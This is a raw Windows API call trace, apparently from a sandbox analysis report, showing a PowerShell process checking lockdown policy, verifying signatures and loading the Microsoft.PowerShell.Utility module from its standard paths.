	[0051.100] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x184c18d210 | out: lpFileInformation=0x184c18d210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1
	[0051.100] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d0f0) returned 1
	[0051.104] WldpGetLockdownPolicy () returned 0x0
	[0051.104] GetSystemInfo (in: lpSystemInfo=0x184c18d270 | out: lpSystemInfo=0x184c18d270*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0051.104] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18d178 | out: phkResult=0x184c18d178*=0x6e0) returned 0x0
	[0051.105] RegQueryValueExW (in: hKey=0x6e0, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184c18d1c8, lpData=0x0, lpcbData=0x184c18d1c0*=0x0 | out: lpType=0x184c18d1c8*=0x0, lpData=0x0, lpcbData=0x184c18d1c0*=0x0) returned 0x2
	[0051.105] RegCloseKey (hKey=0x6e0) returned 0x0
	[0051.105] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18cb60, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0051.105] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d040) returned 1
	[0051.105] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6e0
	[0051.105] GetFileType (hFile=0x6e0) returned 0x1
	[0051.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18cfb0) returned 1
	[0051.105] GetFileType (hFile=0x6e0) returned 0x1
	[0051.105] SetFilePointer (in: hFile=0x6e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x184c18cff8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184c18cff8*=0) returned 0x0
	[0051.105] ReadFile (in: hFile=0x6e0, lpBuffer=0x150474bccd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18d078, lpOverlapped=0x0 | out: lpBuffer=0x150474bccd8*, lpNumberOfBytesRead=0x184c18d078*=0x950, lpOverlapped=0x0) returned 1
	[0051.105] SetFilePointer (in: hFile=0x6e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x184c18cff8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184c18cff8*=0) returned 0x950
	[0051.105] ReadFile (in: hFile=0x6e0, lpBuffer=0x150474bc190, nNumberOfBytesToRead=0x2b0, lpNumberOfBytesRead=0x184c18d078, lpOverlapped=0x0 | out: lpBuffer=0x150474bc190*, lpNumberOfBytesRead=0x184c18d078*=0x0, lpOverlapped=0x0) returned 1
	[0051.106] SetFilePointer (in: hFile=0x6e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x184c18cff8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184c18cff8*=0) returned 0x950
	[0051.106] ReadFile (in: hFile=0x6e0, lpBuffer=0x150474bccd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18d078, lpOverlapped=0x0 | out: lpBuffer=0x150474bccd8*, lpNumberOfBytesRead=0x184c18d078*=0x0, lpOverlapped=0x0) returned 1
	[0051.106] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbbf940
	[0051.106] GetSystemDirectoryW (in: lpBuffer=0x1505fbbf940, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0051.106] CoTaskMemFree (pv=0x1505fbbf940) 
	[0051.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0051.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x184c18cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c
	[0051.106] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18cf90) returned 1
	[0051.106] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x184c18d070 | out: lpFileInformation=0x184c18d070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1
	[0051.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18cf50) returned 1
	[0051.106] WldpGetLockdownPolicy () returned 0x0
	[0051.106] GetSystemInfo (in: lpSystemInfo=0x184c18d0d0 | out: lpSystemInfo=0x184c18d0d0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0051.106] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18cfd8 | out: phkResult=0x184c18cfd8*=0x6e4) returned 0x0
	[0051.106] RegQueryValueExW (in: hKey=0x6e4, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184c18d028, lpData=0x0, lpcbData=0x184c18d020*=0x0 | out: lpType=0x184c18d028*=0x0, lpData=0x0, lpcbData=0x184c18d020*=0x0) returned 0x2
	[0051.106] RegCloseKey (hKey=0x6e4) returned 0x0
	[0051.106] CloseHandle (hObject=0x6e0) returned 1
	[0051.107] CoCreateGuid (in: pguid=0x184c18d188 | out: pguid=0x184c18d188*(Data1=0xa3032d8c, Data2=0xba5, Data3=0x4308, Data4=([0]=0xaa, [1]=0xc7, [2]=0x17, [3]=0x8e, [4]=0xcc, [5]=0x47, [6]=0x46, [7]=0xc0))) returned 0x0
	[0051.107] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18cc40, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0051.111] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0051.111] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18c710, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0051.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18cb50) returned 1
	[0051.111] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18cc30 | out: lpFileInformation=0x184c18cc30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1
	[0051.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18cb10) returned 1
	[0051.111] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18c6c0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0051.111] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18c520, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0051.112] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0051.112] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18ca30) returned 1
	[0051.112] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18cb10 | out: lpFileInformation=0x184c18cb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1
	[0051.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18c9f0) returned 1
	[0051.112] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0051.112] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18c9c0) returned 1
	[0051.112] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6e0
	[0051.112] GetFileType (hFile=0x6e0) returned 0x1
	[0051.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18c930) returned 1
	[0051.112] GetFileType (hFile=0x6e0) returned 0x1
	[0051.112] WTGetSignatureInfo () returned 0x0
	[0051.135] CertDuplicateCertificateContext (pCertContext=0x1505fba66a0) returned 0x1505fba66a0
	[0051.135] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18ca58 | out: phkResult=0x184c18ca58*=0x6f8) returned 0x0
	[0051.135] RegQueryValueExW (in: hKey=0x6f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18caa8, lpData=0x0, lpcbData=0x184c18caa0*=0x0 | out: lpType=0x184c18caa8*=0x1, lpData=0x0, lpcbData=0x184c18caa0*=0x56) returned 0x0
	[0051.135] RegQueryValueExW (in: hKey=0x6f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18caa8, lpData=0x150474e64c8, lpcbData=0x184c18caa0*=0x56 | out: lpType=0x184c18caa8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184c18caa0*=0x56) returned 0x0
	[0051.135] RegCloseKey (hKey=0x6f8) returned 0x0
	[0051.135] CoTaskMemAlloc (cb=0x10) returned 0x1505fb9b0c0
	[0051.135] CoTaskMemAlloc (cb=0x50) returned 0x1505fab8940
	[0051.135] WinVerifyTrust () returned 0x0
	[0051.136] CoTaskMemFree (pv=0x1505fab8940) 
	[0051.136] CoTaskMemFree (pv=0x1505fb9b0c0) 
	[0051.136] CertFreeCertificateContext (pCertContext=0x1505fba66a0) returned 1
	[0051.136] CloseHandle (hObject=0x6e0) returned 1
	[0051.137] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18cd10, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0051.137] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\en-US\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\en-us\\microsoft.powershell.utility.psd1")) returned 0xffffffff
	[0051.137] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\en\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\en\\microsoft.powershell.utility.psd1")) returned 0xffffffff
	[0051.137] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18bd30, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0051.137] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18bd50, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0051.137] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18bcf0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0051.137] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x105, lpBuffer=0x184c18bd00, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f
	[0051.139] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18bd30, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0051.139] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", nBufferLength=0x105, lpBuffer=0x184c18bd50, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x63
	[0051.139] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18c190) returned 1
	[0051.139] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x184c18c270 | out: lpFileInformation=0x184c18c270*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0051.139] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18c150) returned 1
	[0051.139] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff
	[0051.139] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Commands.Utility.dll\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.commands.utility.dll\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff
	[0051.140] CoTaskMemAlloc (cb=0x218) returned 0x1505fbbf0c0
	[0051.140] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1505fbbf0c0, nSize=0x10a | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x93
	[0051.140] CoTaskMemFree (pv=0x1505fbbf0c0) 
	[0051.140] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18bb10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x35
	[0051.140] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18bf50) returned 1
	[0051.140] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\nd9e1fyi\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18c030 | out: lpFileInformation=0x184c18c030*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0051.140] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18bf10) returned 1
	[0051.140] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\nd9e1fyi\\documents\\windowspowershell\\modules")) returned 0xffffffff
	[0051.153] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18bb10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a
	[0051.153] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18bf50) returned 1
	[0051.153] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18c030 | out: lpFileInformation=0x184c18c030*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0051.153] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18bf10) returned 1
	[0051.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x184c18bb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32
	[0051.153] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18bf50) returned 1
	[0051.153] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18c030 | out: lpFileInformation=0x184c18c030*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1
	[0051.153] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18bf10) returned 1
	[0051.153] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x105, lpBuffer=0x184c18b970, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", lpFilePart=0x0) returned 0x50
	[0051.153] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18bdb0) returned 1
	[0051.154] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.utility"), fInfoLevelId=0x0, lpFileInformation=0x184c18be90 | out: lpFileInformation=0x184c18be90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0051.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18bd70) returned 1
	[0051.156] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18bdb0) returned 1
	[0051.156] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.utility"), fInfoLevelId=0x0, lpFileInformation=0x184c18be90 | out: lpFileInformation=0x184c18be90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0051.156] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18bd70) returned 1
	[0051.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x184c18b8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99
	[0051.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x184c18b7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99
	[0051.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x184c18b540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99
	[0051.308] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1")) returned 0x20
